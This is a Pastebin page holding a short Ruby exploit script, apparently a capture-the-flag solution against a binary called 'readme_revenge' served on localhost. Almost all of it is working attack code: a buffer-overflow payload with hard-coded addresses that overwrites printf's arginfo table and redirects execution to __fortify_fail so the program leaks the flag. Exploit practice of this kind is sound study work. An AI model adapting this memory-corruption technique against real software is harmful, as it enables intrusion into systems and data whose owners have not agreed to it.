Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- # encoding: ASCII-8BIT
- # socat TCP-LISTEN:2323,reuseaddr,fork EXEC:./readme_revenge
- # ruby pwn.rb
- require 'pwn'
- context.arch = 'amd64'
- context.log_level = :debug
- z = Sock.new 'localhost', 2323
- # shellcode = p8(0x90) * 8
- payload = ""
- payload += 'A' * 1000
- # payload += cyclic 112
- # payload += shellcode
- # payload += 'A' * (1000 - 112 - shellcode.length)
- payload += p64 0x4359d0 # address to jump to, __fortify_fail
- flag_addr = 0x6b73e0 + 1000 + 8 + 432 + 8
- # Only needed to trigger redirection, most of this
- # could be anywhere in the buffer we send
- payload += 'B' * 432
- payload += p64 flag_addr # pointer to char*
- payload += p64 0x6b4040 # flag
- payload += 'C' * (608 - 432 - 16)
- payload += p64(0) # offset 1000 + 8 + 608 must be 0, else segfault
- payload += 'D' * 112
- payload += p64 0x6b7430 # printf arginfo table
- #payload += cyclic 1000
- z.send payload
- # This works but the program crashes after printing the flag ¯\_(ツ)_/¯
- # z.send(cyclic(1000) + p64(0x6b7450) + 'A' * 608 + p64(0) + cyclic(112) + p64(0x6b7430))
Add Comment
Please, Sign In to add comment